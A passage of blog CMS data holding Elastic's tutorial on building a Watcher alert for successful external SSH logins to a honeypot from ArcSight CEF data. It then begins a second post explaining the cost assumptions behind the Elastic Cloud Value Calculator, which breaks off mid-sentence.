src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt78a901d2bc7dcfa6/5f8788b89245d74a2063ec1b/integrating-arcsight-blog-image.png?disposition=inline\"/\u003e\u003c/p\u003e\u003cp\u003eFor our simple example, we will alert on a successful login when it originates from an external IP. \u0026nbsp;\u003c/p\u003e\u003cp\u003eA successful login from an external IP can be identified by an indexed CEF event containing the following fields and values:\u003cbr /\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003ecategoryBehaviour\u0026nbsp;with a value of cowrie.login.success\u003c/li\u003e\u003cli\u003esourceAddress with a value that is NOT in the range\u0026nbsp;192.168.0.0/16\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eAll watches execute periodically based on a schedule defined in the trigger block. We will set our watch to execute every N seconds and evaluate the last N seconds for a match. To filter the last N seconds, we evaluate events with a @timestamp \u0026gt; now-N seconds. We will trigger an alert if even a single match is detected. Finally, in order to provide a useful summary, we use aggregations to indicate the target server, source IP and time in any action output.\u003cbr /\u003e\u003c/p\u003e\u003cp\u003eWe will the apply the same iterative process to construct a watch in future example in this series. First we identify the input and query to capture the relevant data before evaluating the response with a condition to determine whether the watch fires an action. Next we extract the data points of interest through a transformation before finally taking action.\u003cbr /\u003e\u003c/p\u003e\u003cp\u003eAs described in the \u003ca href=\"https://github.com/elastic/examples/tree/master/Security%20Analytics/ssh_analysis\"\u003edeployment instructions\u003c/a\u003e, we assume that the user is interacting with Elasticsearch and Watcher APIs via the Dev Tools -\u0026gt; Console app in Kibana.\u003cbr /\u003e\u003c/p\u003e\u003ch4\u003eStep 1 - Set Up Watch Trigger and Watch Input\u003c/h4\u003e\u003cp\u003eThe first step in constructing our watch is to identify the watch execution schedule i.e., how often it should execute and over which time window. \u0026nbsp;This defines the \"responsiveness\" of our watch and how often we can potentially raise an alert. \u0026nbsp;For this example, we will execute our watch every 10 seconds looking for potential successful remote logins.\u003c/p\u003e\u003cp\u003eWe next need to identify the data we wish to evaluate in our watch. This requires an \u003ca href=\"https://www.elastic.co/guide/en/x-pack/current/input.html\"\u003einput\u003c/a\u003e to load our data into the current execution context. As our SSH events are stored in Elasticsearch we utilise a \u003ca href=\"https://www.elastic.co/guide/en/x-pack/current/input-search.html\"\u003eSearch input\u003c/a\u003e to load the results from a query. The query itself uses a simple boolean match to identify those documents in the last 10 seconds which indicate a successful login from a remote IP.\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003e{\u003cbr /\u003e \"trigger\": {\u003cbr /\u003e \"schedule\": {\u003cbr /\u003e \"interval\": \"10s\"\u003cbr /\u003e }\u003cbr /\u003e },\u003cbr /\u003e \"input\": {\u003cbr /\u003e \"search\": {\u003cbr /\u003e \"request\": {\u003cbr /\u003e \"indices\": [\u003cbr /\u003e \"cef-ssh-*\"\u003cbr /\u003e ],\u003cbr /\u003e \"types\": [\u003cbr /\u003e \"syslog\"\u003cbr /\u003e ],\u003cbr /\u003e \"body\": {\u003cbr /\u003e \"query\": {\u003cbr /\u003e \"bool\": {\u003cbr /\u003e \"must_not\": [\u003cbr /\u003e {\u003cbr /\u003e \"term\": {\u003cbr /\u003e \"sourceAddress\": {\u003cbr /\u003e \"value\": \"192.168.0.0/16\"\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e ],\u003cbr /\u003e \"filter\": [\u003cbr /\u003e {\u003cbr /\u003e \"term\": {\u003cbr /\u003e \"categoryBehaviour\": \"cowrie.login.success\"\u003cbr /\u003e }\u003cbr /\u003e },\u003cbr /\u003e {\u003cbr /\u003e \"range\": {\u003cbr /\u003e \"@timestamp\": {\u003cbr /\u003e \"gte\": \"now-10s\"\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e ]\u003cbr /\u003e }\u003cbr /\u003e },\u003cbr /\u003e \"size\": 100,\u003cbr /\u003e \"_source\": [\u003cbr /\u003e \"destinationHostName\",\u003cbr /\u003e \"sourceAddress\",\u003cbr /\u003e \"@timestamp\"\u003cbr /\u003e ]\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\u003ch5\u003eSome Considerations\u003c/h5\u003e\u003cp\u003eThe above query requests 100 results only. This limits us to alerting on 100 successful logins every 10 seconds - more than sufficient for most infrastructures! As each document represents a successful login, we restrict the data we report to the destinationHostName, sourceAddress and @timestamp using a _source filter.\u003c/p\u003e\u003cp\u003eFor the purposes of testing, we can remove the date filter to execute the query across the entire dataset - thus avoiding the need to execute the watch for every period. For the final watch shown in \u003ca href=\"#step_5\"\u003eStep 5 - Put It all together\u003c/a\u003e, we restore this filter for completeness.\u003c/p\u003e\u003ch4\u003eStep 2\u0026nbsp;- Setup Watch Condition\u003c/h4\u003e\u003cp\u003eThe previous step caused the results of the query to be loaded into the execution context as a dictionary. \u0026nbsp;This is accessible through the ctx.payload parameter. We utilise this to evaluate whether an action should be taken through a \u003ca href=\"https://www.elastic.co/guide/en/x-pack/5.1/condition.html\"\u003econdition\u003c/a\u003e, which determines whether the watch will fire by returning true or false. Here we find a compare condition is sufficient, evaluating whether the number of hits is \u0026gt; 0. In later posts, we utilise the more powerful \u003ca href=\"https://www.elastic.co/guide/en/x-pack/5.1/condition-script.html\"\u003escript\u003c/a\u003e condition.\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003e\"compare\": {\u003cbr /\u003e \"ctx.payload.hits.total\": {\u003cbr /\u003e \"gt\": 0\u003cbr /\u003e }\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\u003ch4\u003eStep 3\u0026nbsp;- Transform Watch Input into Watch Payload\u003c/h4\u003e\u003cp\u003eRather than sending out alerts with the full query response, we can use a transform stage to modify the payload into a more readable structure. This will also be required for Step 4, where we aim to index each matching response document back into Elasticsearch for visualisation purposes. Fortunately, we can achieve this with a simple \u003ca href=\"https://www.elastic.co/guide/en/x-pack/current/transform-script.html\"\u003escript transform\u003c/a\u003e and one line in Elasticsearch’s native scripting language \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/modules-scripting-painless-syntax.html\"\u003ePainless\u003c/a\u003e. \u0026nbsp;\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003e\"transform\": {\u003cbr /\u003e \"script\": \"return ctx.payload.hits.hits.stream().map(d -\u0026gt; ['@timestamp':d._source['@timestamp'],'sourceAddress':d._source.sourceAddress,'destinationHostName':d._source.destinationHostName]).collect(Collectors.toList());\"\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003e\u003cspan style=\"background-color: initial;\"\u003eExample output payload:\u003c/span\u003e\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003e[\u003cbr /\u003e {\u003cbr /\u003e \"@timestamp\": \"2016-11-16T17:35:50.000Z\",\u003cbr /\u003e \"destinationHostName\": \"elastic_honeypot\",\u003cbr /\u003e \"source_ip\": \"62.57.78.153\"\u003cbr /\u003e },\u003cbr /\u003e {\u003cbr /\u003e \"@timestamp\": \"2016-11-16T12:15:57.000Z\",\u003cbr /\u003e \"destinationHostName\": \"elastic_honeypot\",\u003cbr /\u003e \"source_ip\": \"5.45.84.12\"\u003cbr /\u003e }\u003cbr /\u003e]\u003cbr /\u003e\u003c/pre\u003e\u003ch4\u003eStep 4\u0026nbsp;- Set Up Watch Actions\u003c/h4\u003e\u003cp\u003eOn detecting successful remote logins we would typically raise an alert through the appropriate medium e.g., a ticketing system for the analyst to investigate. Whilst these are \u003ca href=\"https://www.elastic.co/guide/en/x-pack/current/actions-jira.html\"\u003esupported in Alerting\u003c/a\u003e, for the purposes of example we can simulate this process by indexing a doc for each login to ES using the \u003ca href=\"https://www.elastic.co/guide/en/x-pack/current/actions-index.html\"\u003eindex action\u003c/a\u003e.\u003c/p\u003e\u003cp\u003eOur index action requires the document be placed in the the \u003ca href=\"https://www.elastic.co/guide/en/x-pack/current/actions-index.html#anatomy-actions-index-multi-doc-support\"\u003eappropriate \"_doc\" key\u003c/a\u003e, achieved through a simple Painless script.\u003cspan\u003e\u003c/span\u003e\u003cbr /\u003e\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003e\"index_payload\": {\u003cbr /\u003e \"transform\": {\u003cbr /\u003e \"script\": \"return ['_doc':ctx.payload._value];\"\u003cbr /\u003e },\u003cbr /\u003e \"index\": {\u003cbr /\u003e \"index\": \"cef-ssh-watch-results\",\u003cbr /\u003e \"doc_type\": \"watch-result\"\u003cbr /\u003e }\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\u003ch4\u003eStep 5\u0026nbsp;- Put It\u0026nbsp;It All Together\u003c/h4\u003e\u003cp\u003eIn assembling the above, we need to consider some X-Pack alerting level parameters. As shown below we control how often the watch is executed using a \u003ca href=\"https://www.elastic.co/guide/en/x-pack/current/trigger-schedule.html#schedule-interval\"\u003eschedule interval\u003c/a\u003e. This should be consistent with the range query, which uses the \u003ca href=\"https://www.elastic.co/guide/en/x-pack/5.1/how-watcher-works.html#watch-execution-context\"\u003escheduled time\u003c/a\u003e to ensure watches do not overlap. Finally, by assuming daily indices for our events we are able to target the query at only the current day’s index for efficiency.\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003e{\u003cbr /\u003e \"trigger\": {\u003cbr /\u003e \"schedule\": {\u003cbr /\u003e \"interval\": \"10s\"\u003cbr /\u003e }\u003cbr /\u003e },\u003cbr /\u003e \"input\": {\u003cbr /\u003e \"search\": {\u003cbr /\u003e \"request\": {\u003cbr /\u003e \"indices\": [\u003cbr /\u003e \"\u0026lt;cef-ssh-{now/d}\u0026gt;\"\u003cbr /\u003e ],\u003cbr /\u003e \"types\": [\u003cbr /\u003e \"syslog\"\u003cbr /\u003e ],\u003cbr /\u003e \"body\": {\u003cbr /\u003e \"query\": {\u003cbr /\u003e \"bool\": {\u003cbr /\u003e \"must_not\": [\u003cbr /\u003e {\u003cbr /\u003e \"term\": {\u003cbr /\u003e \"sourceAddress\": {\u003cbr /\u003e \"value\": \"192.168.0.0/16\"\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e ],\u003cbr /\u003e \"filter\": [\u003cbr /\u003e {\u003cbr /\u003e \"term\": {\u003cbr /\u003e \"categoryBehaviour\": \"cowrie.login.success\"\u003cbr /\u003e }\u003cbr /\u003e },\u003cbr /\u003e {\u003cbr /\u003e \"range\": {\u003cbr /\u003e \"@timestamp\": {\u003cbr /\u003e \"gte\": \"{{ctx.trigger.scheduled_time}}||-10s\"\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e ]\u003cbr /\u003e }\u003cbr /\u003e },\u003cbr /\u003e \"size\": 100,\u003cbr /\u003e \"_source\": [\u003cbr /\u003e \"destinationHostName\",\u003cbr /\u003e \"sourceAddress\",\u003cbr /\u003e \"@timestamp\"\u003cbr /\u003e ]\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e },\u003cbr /\u003e \"condition\": {\u003cbr /\u003e \"compare\": {\u003cbr /\u003e \"ctx.payload.hits.total\": {\u003cbr /\u003e \"gt\": 0\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e },\u003cbr /\u003e \"transform\": {\u003cbr /\u003e \"script\": \"return ctx.payload.hits.hits.stream().map(d -\u0026gt; ['@timestamp':d._source['@timestamp'],'sourceAddress':d._source.sourceAddress,'destinationHostName':d._source.destinationHostName]).collect(Collectors.toList());\"\u003cbr /\u003e },\u003cbr /\u003e \"actions\": {\u003cbr /\u003e \"index_payload\": {\u003cbr /\u003e \"transform\": {\u003cbr /\u003e \"script\": \"return ['_doc':ctx.payload._value];\"\u003cbr /\u003e },\u003cbr /\u003e \"index\": {\u003cbr /\u003e \"index\": \"cef-ssh-watch-results\",\u003cbr /\u003e \"doc_type\": \"watch-result\"\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003eTo insert the watch, use the PUT API as described \u003ca href=\"https://www.elastic.co/guide/en/x-pack/current/watcher-api-put-watch.html\"\u003ehere\u003c/a\u003e. Alternatively, remove the date filter and execute the watch across the dataset using the \u003ca href=\"https://www.elastic.co/guide/en/x-pack/current/watcher-api-execute-watch.html#watcher-api-execute-inline-watch\"\u003einline execution API\u003c/a\u003e. This will result in an indexed document for up to 100 successful logins that exist in the dataset. Using the dashboard from earlier, we can add a table visualization populated with the latest successful remote login to each server.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://api.contentstack.io/v2/uploads/5873a705e52e8fd3503db6e6/download?uid=blt1926efa5c2fc9885\" data-sys-asset-uid=\"blt1926efa5c2fc9885\" alt=\"Screenshot 2017-01-09 14.49.55.png\"/\u003e\u003c/p\u003e\u003ch4\u003eFinal Thoughts\u003c/h4\u003e\u003cp\u003eIn our next post we will \u003ca href=\"https://www.elastic.co/blog/integrating-elasticsearch-with-arcsight-siem-part-3\"\u003elearn how to scale the architecture\u003c/a\u003e we discussed in \u003ca href=\"https://www.elastic.co/blog/integrating-elasticsearch-with-arcsight-siem-part-1\"\u003ePart 1\u003c/a\u003e\u0026nbsp;before we look at detecting and alerting on more complex\u0026nbsp;patterns with X-Pack alerting features.\u003c/p\u003e\u003cp\u003e\u003cem\u003eInteresting in learning more? Check out other posts in the Elasticsearch + ArcSight series.\u003c/em\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/integrating-elasticsearch-with-arcsight-siem-part-1\"\u003e\u003cem\u003ePart 1 - How to send Common Event Format data from ArcSight to Elasticsearch\u003c/em\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/integrating-elasticsearch-with-arcsight-siem-part-2\"\u003e\u003cem\u003ePart 2 - How to proactively monitor security data in Elasticsearch with X-Pack alerting features\u003c/em\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/integrating-elasticsearch-with-arcsight-siem-part-3\"\u003e\u003cem\u003ePart 3 - Scaling your ArcSight and Elasticsearch\u0026nbsp;architecture\u003c/em\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/integrating-elasticsearch-with-arcsight-siem-part-4\"\u003e\u003cem\u003ePart 4\u0026nbsp;-\u0026nbsp;Detecting Successful SSH Brute Force Attacks\u003c/em\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/integrating-elasticsearch-with-arcsight-siem-part-5\"\u003e\u003cem\u003ePart 5\u0026nbsp;-\u0026nbsp;Detecting Unusual Process using Rules Based Alerts\u003c/em\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/blog/integrating-elasticsearch-with-arcsight-siem-part-6\"\u003e\u003cem\u003ePart 6\u0026nbsp;-\u0026nbsp;Using Machine Learning to Detect Rare (unusual) Processes on a Server\u003c/em\u003e\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cbr /\u003e\u003c/p\u003e","callout":[],"category":[{"uid":"blte5cc8450a098ce5e","_version":4,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:15.490Z","created_by":"blt3044324473ef223b70bc674c","key":"how-to","label_l10n":"How to","tags":[],"title":"How to","updated_at":"2024-05-10T13:44:25.495Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.353Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-04-01T13:19:20.718Z","created_by":"sys_blt57a423112de8a853","disclaimer":["bltf7e0361d38ceea67"],"full_bleed_image":{"uid":"bltaada3a3e24250a11","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2018-10-11T09:09:11.796Z","updated_at":"2018-10-11T09:09:11.796Z","content_type":"image/jpeg","file_size":"167536","filename":"elasticsearch-arcsight-elastic-stack-siem-full-bleed.jpg","title":"elasticsearch-arcsight-elastic-stack-siem-full-bleed.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-05-02T02:58:59.939Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltaada3a3e24250a11/5bbf133752d7ede27f815416/elasticsearch-arcsight-elastic-stack-siem-full-bleed.jpg"},"markdown_l10n":"","publish_date":"2017-01-09T17:00:00.000Z","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Integrating Elasticsearch with ArcSight SIEM - Part 2","seo_description_l10n":"Learn how to create security alerts using the ElasticStack's X-Pack alerting features on ArcSight data.","canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blt52ff9d27b0e6ffbf","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2018-10-11T09:09:08.823Z","updated_at":"2018-10-11T09:09:08.823Z","content_type":"image/jpeg","file_size":"47634","filename":"scaled.jpg","title":"scaled.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-05-02T02:58:59.939Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt52ff9d27b0e6ffbf/5bbf1334b160bf6a367ebeb1/scaled.jpg"},"title":"Integrating Elasticsearch with ArcSight SIEM - Part 2","title_l10n":"Integrating Elasticsearch with ArcSight SIEM - Part 2","updated_at":"2024-11-06T23:44:34.192Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/integrating-elasticsearch-with-arcsight-siem-part-2","publish_details":{"time":"2024-11-06T23:44:37.979Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt756800a6c656d4b6","_version":10,"locale":"en-us","ACL":{},"abstract_l10n":"A deep dive into the Elastic Cloud Value Calculator calculations and assumptions. Use it to understand the details behind each benefit group, or leverage it to create your own version custom to your situation.","author":["blt70c76c99e0846d48"],"body_l10n":"\u003cp\u003eAs your Elastic usage increases and your use cases expand, it's important to know the benefits and cost savings that you can achieve by running Elasticsearch as a service. But since every Elasticsearch implementation can vary by use case and deployment model, it can be complicated to tackle on your own. So with that in mind, we are excited to share the \u003ca href=\"https://www.elastic.co/cloud/value-calculator\"\u003eElastic Cloud Value Calculator\u003c/a\u003e.\u003c/p\u003e\u003cp\u003eWith this calculator, you can easily estimate cost savings and increases in productivity based on infrastructure needs, efficiency factors, potential risks, and more. Then, based on your results, you'll know how Elastic Cloud creates potential efficiencies for you, or help you determine if you're already on the right track. The calculator just does the hard part of handling the variables of your specific situation.\u003c/p\u003e\u003cp\u003eOne point before we get into the details. In developing this tool we have partnered with \u003ca href=\"https://www.decisionlink.com/\"\u003eDecisionLink\u003c/a\u003e, who has\u0026nbsp;many years of experience in developing web calculators and value models. We are grateful for their expertise in defining the assumptions with us below.\u003c/p\u003e\u003cp\u003eLet's take a look at the logic and assumptions built into this tool. On to the math!\u003c/p\u003e\u003ch2\u003eReduce IT infrastructure and storage costs\u003c/h2\u003e\u003cp\u003eCost savings usually start here, as it’s quite frequently the biggest bucket of potential value. Some of the factors the calculator takes into account are:\u003c/p\u003e\u003cul\u003e\u003cli\u003eWhat instance types (and their respective costs) are you running Elastic on?\u003c/li\u003e\u003cli\u003eWhat do those instances cost annually?\u003c/li\u003e\u003cli\u003eIf you aren't on Elastic Cloud, are you using reserve or on-demand pricing?\u003c/li\u003e\u003cli\u003eIf you're running Elasticsearch in your own data center, what is the three-year amortized value of the hardware?\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eThe first situation we filter for is whether you are running Elastic in your own data center or running it self-managed on a cloud provider. Each situation has its own infrastructure cost implications, which we break down below.\u003c/p\u003e\u003ch4\u003eSelf-hosted in your own data center\u003c/h4\u003e\u003cp\u003e\u003cstrong\u003eReduce self-hosted server costs:\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e# of nodes * annual cost per server (server purchase / 3 years)\u0026nbsp;* 100% reduction of future server cost\u003c/p\u003e\u003cp\u003eNote: For self-hosted servers, we assume a 1:1 ratio of server to node. If you are using larger machines that can handle multiple nodes, you’ll need to divide the annual cost of a server by the number of nodes you are running on each server in order to get the appropriate cost comparison.\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eReduce server maintenance cost:\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e# of nodes * 20% of annual server cost for maintenance \u0026amp; support\u0026nbsp;* 100% reduction of future server maintenance cost\u003c/p\u003e\u003cp\u003eNote: Maintenance of a server depends largely on the type of server and how old it is. Newer servers generally require less maintenance and support vs older ones (3+ years).\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eReduce data center overhead cost (heating, cooling, electric):\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e# of nodes * 25% of annual server cost for infrastructure overhead\u0026nbsp;* 100% reduction of future server maintenance cost\u003c/p\u003e\u003cp\u003eFor an overview of power usage associated with servers see this \u003ca href=\"https://www.zdnet.com/article/toolkit-calculate-datacenter-server-power-usage/\"\u003eZD net article\u003c/a\u003e on the topic.\u003c/p\u003e\u003ch4\u003eSelf-hosted on another cloud provider\u003c/h4\u003e\u003cp\u003e\u003cstrong\u003eReduce cost of cloud services:\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e# of nodes * annual cost per cloud virtual machine\u0026nbsp;* 100% reduction of future cloud virtual machine cost\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eReduce cost of data transfer and storage (DTS):\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e# of nodes * 20% of annual cloud virtual machine cost DTS\u0026nbsp;* 100% reduction of DTS cost\u003c/p\u003e\u003ch4\u003eGeneral benefits applied in both situations\u003c/h4\u003e\u003cp\u003e\u003cstrong\u003eReduce software licensing costs:\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e# of nodes * 10% annual cost per server or cloud virtual machine\u0026nbsp;* 100% reduction of future server license cost\u003c/p\u003e\u003cp\u003eNote: Assumptions\u0026nbsp;here depend on whether you are using open source Linux, a RedHat distribution of the same, or something else for your server OS. Also, please keep in mind that this will be much higher if you are already paying for an Elastic licensed tier of software (Gold, Platinum, Enterprise) so you will need to take that into account and increase this amount if you are comparing self-managed to Elastic Cloud.\u003c/p\u003e\u003ch3\u003eReduce overprovisioning cost of hardware\u003c/h3\u003e\u003cp\u003eWe run into overprovisioned hardware on a regular basis. Whether you overestimated or are just planning for worst-case scenarios, Elastic Cloud can help you get your sizing right, regardless of the risks you need to mitigate. In addition, we just launched a new \u003ca href=\"https://www.elastic.co/blog/autoscale-your-elastic-cloud-data-and-machine-learning-nodes\"\u003eautoscaling capability\u003c/a\u003e that will remove the need for you to ever have to worry about rightsizing your Elastic environment again when you use Elastic Cloud.\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eReduce overprovisioning cost of hardware:\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e# of nodes * annual cost per server or cloud virtual machine\u0026nbsp;* 22.5% reduction of future overprovisioning costs\u003c/p\u003e\u003cp\u003eNote: We see ranges of overprovisioning usually between 15-30% of the total infrastructure required.\u003c/p\u003e\u003ch3\u003eReduce unnecessary data duplication cost\u003c/h3\u003e\u003cp\u003eFor the large community out there who are running Elastic self-managed on our free and open or Basic tiers, many will twist their deployment in order to reduce risk of exposure of data to the wrong audience. Often, the logical way to do this is to duplicate a portion of the data in your current Elastic cluster and put that portion of data in a new, isolated cluster for a specific audience. However, this effort can be reduced or eliminated by taking advantage of security and access controls, easily configured with Elastic Cloud.\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eReduce data duplication cost with access controls:\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e[# of nodes * % of nodes duplicated (30% assumed without access controls)] * annual duplication cost per node (both infra and human capital costs) * 30% reduction of future duplication costs\u003c/p\u003e\u003cp\u003eNote: We assume only 30% reduction in cost here in order to be conservative and to take into account the probability of this happening in all situations. If this is occurring in your situation, you should consider this improvement factor to be 100%.\u003c/p\u003e\u003ch3\u003eSubscription-level features\u003c/h3\u003e\u003cp\u003eLastly, there are powerful features in our Enterprise tier that you only have access to as an Elastic customer, such as \u003ca href=\"https://www.elastic.co/blog/whats-new-cloud-autoscaling-cross-cluster-search-data-tiers\"\u003esearchable snapshots and data tiers\u003c/a\u003e. The cold data tier enables you to run a single node of Elastic with the replica stored in durable object storage (Amazon S3, Azure Blob Storage, or Google Cloud Storage) to reduce replication cost. So you can still search the cold node, with snappy responsiveness, but with the backup being an ultra low-cost alternative. And that’s just the beginning. We’re currently working on a searchable frozen tier that sits entirely within object storage with an even more compelling cost profile.\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eReduce hardware cost with data tiering (not applied within model, but worth considering):\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e# of nodes in warm data tier (assumes 50% of total nodes) * annual cost per server or cloud virtual machine * 50% reduction of future infrastructure costs through use of data tiers\u003c/p\u003e\u003ch2\u003eIT efficiency\u003c/h2\u003e\u003cp\u003eRunning and administering the Elastic Stack can take time and personnel. Deployments often start small, with little administrative overhead. But as adoption increases, so does the implementation size, and so do the demands (and expectations) of your users. We are always working to make the administration easier from within Kibana, but there is a lot to keep in mind: shards, replicas, scaling, upgrading, security, compliance, capacity, and more. These are things that aren't necessarily considered the first time a cluster is spun up.\u003c/p\u003e\u003cp\u003eGenerally speaking, a 25-node cluster of Elastic for logging or observability will require about 50% of a person’s time to manage and orchestrate, based on anecdotal evidence and discussions with the many folks here at Elastic who have done the work. So to apply some logic to that, if 50 nodes = 1 DevOps full-time employee (FTE), then 1 node = 0.02 FTEs.\u003c/p\u003e\u003cp\u003eBut with Elastic Cloud, we frequently see 70% of that operational overhead removed from our administrators’ daily lives. Now you only need to take up a smaller fraction of someone's time per node, as Elastic Cloud takes care of many of the details. The ratio becomes 200 nodes to 1 FTE.\u003c/p\u003e\u003cp\u003eIf you want a better view into how we can divide and conquer the work together, have a look through \u003ca href=\"https://www.elastic.co/cloud/shared-responsibility\"\u003eour responsibility matrix\u003c/a\u003e. The main responsibilities Elastic Cloud helps to make much easier include:\u003c/p\u003e\u003col\u003e\u003cli\u003eReducing overall DevOps automation required through predefined APIs and protocols. This broader category accounts for the lion’s share of the automation benefits to administrative teams.\u003cbr /\u003e\u003cbr /\u003e\u003cstrong\u003eReduce IT staff through Elastic Cloud orchestration:\u003c/strong\u003e\u003cbr /\u003e# of FTEs for running Elastic self managed on a node basis * $100,000 FTE * 70% reduction in FTE time required to manage Elastic\u003cbr /\u003e\u003c/li\u003e\u003c/ol\u003e\u003col start=\"2\"\u003e\u003cli\u003eReducing time to manage upgrades by 95%.\u003cbr /\u003e\u003cbr /\u003e\u003cstrong\u003eReduce time to manage upgrades:\u003c/strong\u003e\u003cbr /\u003eNumber of upgrades per year (assume 2X as a starting point) * $3,200 per upgrade (64 hours) * 95% reduction in time for managing upgrades\u003cbr /\u003e\u003c/li\u003e\u003c/ol\u003e\u003col start=\"3\"\u003e\u003cli\u003eReducing risk of managing critical vulnerability incidents and associated costs to near zero.\u003cbr /\u003e\u003cbr /\u003e\u003cstrong\u003eReduce risk of critical vulnerability incidents:\u003c/strong\u003e\u003cbr /\u003e# of critical vulnerabilities per year (assumes 4) * $4,000 per critical vulnerability engineering time (80 hours) * 10% reduction in critical vulnerability incidents\u003c/li\u003e\u003c/ol\u003e\u003ch2\u003eRevenue and employee disruption risk\u003c/h2\u003e\u003cp\u003eThis value category is potentially the largest, depending on your situation. Let’s talk about what it means to your business to run a highly stable, scalable, and resilient service with Elastic central to your architecture.\u003c/p\u003e\u003ch3\u003eEmployee disruption risk reduction\u003c/h3\u003e\u003cp\u003eThis is the most common and important area of downstream user risk reduction. There are two big questions you need to consider here:\u003c/p\u003e\u003col\u003e\u003cli\u003eHow many people at your company are using Elastic today (in some form) based on your implementation?\u003c/li\u003e\u003cli\u003eWhat is the cost of employees not having access to your Elastic implementation?\u003c/li\u003e\u003c/ol\u003e\u003cp\u003eIf it’s a security- or observability-related application, this could mean that your end users lack support when there is an urgent security or downtime risk-related incident that needs to be addressed. Ask yourself:\u003c/p\u003e\u003cul\u003e\u003cli\u003eWhat is the cost per minute of disruption and downtime?\u003c/li\u003e\u003cli\u003eWill a single failure cause a domino effect of failures?\u003c/li\u003e\u003cli\u003eIf there's an outage, will the observability solution also fail?\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eAnd maybe most importantly: How forgiving will stakeholders be when preventable infrastructure issues cause business outages?\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eImprove end-user productivity through reduced risk of disruptions:\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e# of employee end users of the solution * $100,000 per FTE * 1% improvement in end user productivity\u003c/p\u003e\u003cp\u003eNote: This improvement factor assumption means that your end users would experience 1% less downtime due to solution disruption. We generally see higher downtime for internal employee-facing applications, and as a result chose this improvement factor. Keep in mind that your uptime improvement should be based on your current uptime service-level agreement (SLA).\u003c/p\u003e\u003ch3\u003eRevenue and service risk\u003c/h3\u003e\u003cp\u003eThis calculation takes into account the risks associated with a customer-facing service you are running on Elastic. What is the risk of an outage associated with that service? Is there potential revenue at risk, and if so, how much?\u003c/p\u003e\u003cp\u003eThese are all good things to 